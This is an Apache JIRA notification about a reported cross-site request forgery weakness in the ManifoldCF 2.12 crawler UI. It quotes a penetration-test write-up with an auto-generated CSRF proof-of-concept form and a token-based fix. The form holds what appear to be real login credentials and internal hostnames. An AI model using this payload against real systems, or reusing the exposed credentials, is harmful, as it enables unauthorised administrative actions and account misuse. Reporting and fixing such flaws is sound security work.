[ https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16803825#comment-16803825 ]
roel goovaerts commented on CONNECTORS-1595: -------------------------------------------- Thank you for your quick reply. The point you rise were also mentioned by us in the conversations around these issues. The ui is indeed only used as a back-office application. It was, however, my responsibility to report these issues to check if there was something that could be done. Thanks for your time, Roel > cross-site request forgery vulnerability > ---------------------------------------- > > Key: CONNECTORS-1595 > URL: https://issues.apache.org/jira/browse/CONNECTORS-1595 > Project: ManifoldCF > Issue Type: Improvement > Components: API > Affects Versions: ManifoldCF 2.12 > Reporter: roel goovaerts > Priority: Minor > > Below is the full analysis and description as a result from the penetration > test. > *Summary* > The application is vulnerable to Cross-Site Request Forgery (CSRF). > A cross-site request forgery attack uses the following scenario: > 1. An attacker creates a web page that includes an image or a form pointing > to the attacked application. > The image source would actually be a URL with parameters pointing to the > application page that > performs some action. In case of a form, the form action would point to the > action page in the target > application, and the form is submitted automatically by JavaScript when the > page is viewed. > 2. The attacker tricks the victim user to browse to this page. The attacker > may get the victim to click a > link, or embed the attacking HTML code into some page the victim views, for > example in a bulletin > board or chat. > 3. When the victim views the attacker's page, his browser sends a request > prepared by the attacker to > the attacked application. If the victim is logged in to the target > application, his browser will possess > all necessary session tokens, so the request will appear as authorized to the > application and > succeed. > A cross-site request forgery attack uses the fact that the victim's browser > possesses the necessary > authentication tokens to perform some actions in the target application. > *Impact* > A remote, unauthenticated attacker that can trick an authenticated user into > clicking a link crafted by the > attacker or open a malicious web page, can force the victim to unknowingly > perform various actions within > the application. > Given that the whole application is not protected against CSRF, any action > that an administrator can take on > Apache Manifold could be unknowingly performed if they fall for a CSRF attack. > *Affected Systems* > * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/] > *Description* > It appears that the application does not implement any CSRF protection. > Consider the following example. An > attacker tricks a logged in application user to visit a page containing the > following code: > {code:java} > <html> > <!-- CSRF PoC - generated by Burp Suite Professional --> > <body> > <script>history.pushState('', '', '/')</script> > <form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp" > method="POST" enctype="multipart/form-data"> > <input type="hidden" name="op" value="Save" /> > <input type="hidden" name="type" value="connection" /> > <input type="hidden" name="tabname" value="Name" /> > <input type="hidden" name="isnewconnection" value="false" /> > <input type="hidden" name="connname" value="clix-fr" /> > <input type="hidden" name="description" value="" /> > <input type="hidden" name="classname" > value="org.apache.manifoldcf.crawler.connectors.webcrawler.Webcr > awlerConnector" /> > <input type="hidden" name="authorityname" value="_none_" /> > <input type="hidden" name="throttlecount" value="0" /> > <input type="hidden" name="maxconnections" value="10" /> > <input type="hidden" name="email" > value="ferdi.klomp@craftworkz.nl" /> > <input type="hidden" name="robotsusage" value="none" /> > <input type="hidden" name="metarobotstagsusage" value="all" /> > <input type="hidden" name="regexp_bandwidth_0" value="" /> > <input type="hidden" name="insensitive_bandwidth_0" value="false" /> > <input type="hidden" name="connections_bandwidth_0" value="2" /> > <input type="hidden" name="rate_bandwidth_0" value="64" /> > <input type="hidden" name="fetches_bandwidth_0" value="12" /> > <input type="hidden" name="bandwidth_count" value="1" /> > <input type="hidden" name="acredential_count" value="0" /> > <input type="hidden" name="scredential_0_regexp" > value="https://intrauat.web.bc/" /> > <input type="hidden" name="scredential_0_0_regexp" value="login" > /> > <input type="hidden" name="scredential_0_0_type" value="form" /> > <input type="hidden" name="scredential_0_0_matchregexp" > value="validation" /> > <input type="hidden" name="scredential_0_0_overridetargeturl" > value="" > /> > <input type="hidden" name="scredential_0_0_0_op" > value="Continue" /> > <input type="hidden" name="scredential_0_0_0_param" > value="username" /> > <input type="hidden" name="scredential_0_0_0_value" > value="id996812" /> > <input type="hidden" name="scredential_0_0_0_password" > value="" /> > <input type="hidden" name="scredential_0_0_1_op" > value="Continue" /> > <input type="hidden" name="scredential_0_0_1_param" > value="password" /> > <input type="hidden" name="scredential_0_0_1_value" > value="Th1sIs4cl1X" /> > <input type="hidden" name="scredential_0_0_1_password" > value="" /> > <input type="hidden" name="scredential_0_0_2_op" > value="Continue" /> > <input type="hidden" name="scredential_0_0_2_param" > value="login-form-type" /> > <input type="hidden" name="scredential_0_0_2_value" > value="pwd" /> > <input type="hidden" name="scredential_0_0_2_password" > value="" /> > <input type="hidden" name="scredential_0_0_loginparamcount" > value="3" /> > <input type="hidden" name="scredential_0_loginpagecount" value="1" /> > <input type="hidden" name="scredential_count" value="1" /> > <input type="hidden" name="regexp_trust_0" > value="https://intrauat.web.bc" /> > <input type="hidden" name="trustall_trust_0" value="false" /> > <input type="hidden" name="trust_count" value="1" /> > <input type="hidden" name="proxyhost" value="" /> > <input type="hidden" name="proxyport" value="" /> > <input type="hidden" name="proxyauthusername" value="" /> > <input type="hidden" name="proxyauthdomain" value="" /> > <input type="hidden" name="proxyauthpassword" value="" /> > <input type="hidden" name="client_timezone_offset" value="-60" /> > <input type="hidden" name="client_timezone" value="Europe/Zurich" /> > <input type="submit" value="Submit request" /> > </form> > </body> > </html> > {code} > When the victim's browser parses the page and tries to load images, it will > cause them to execute any action > of the attacker's choosing on Manifold. > *Recommendations* > The usual approach to preventing CSRF attacks is to add a new parameter with > an unpredictable value to > each form or link that performs some action in the application, commonly > referred to as a CSRF-Token. The > parameter value should have enough entropy so that it cannot be predicted by > an attacker and should be > unique to the current user session. When the user submits the form or clicks > the link, the server side code > checks the parameter value. If it is valid, the request is accepted, > otherwise it is denied. The attacker has no > way of knowing the value of the unpredictable parameter, so he cannot > construct a form or link that will > submit a valid request. > *References* > * OWASP - Cross-Site Request Forgery - > [https://www.owasp.org/index.php/Cross-] > Site_Request_Forgery -- This message was sent by Atlassian JIRA (v7.6.3#76005)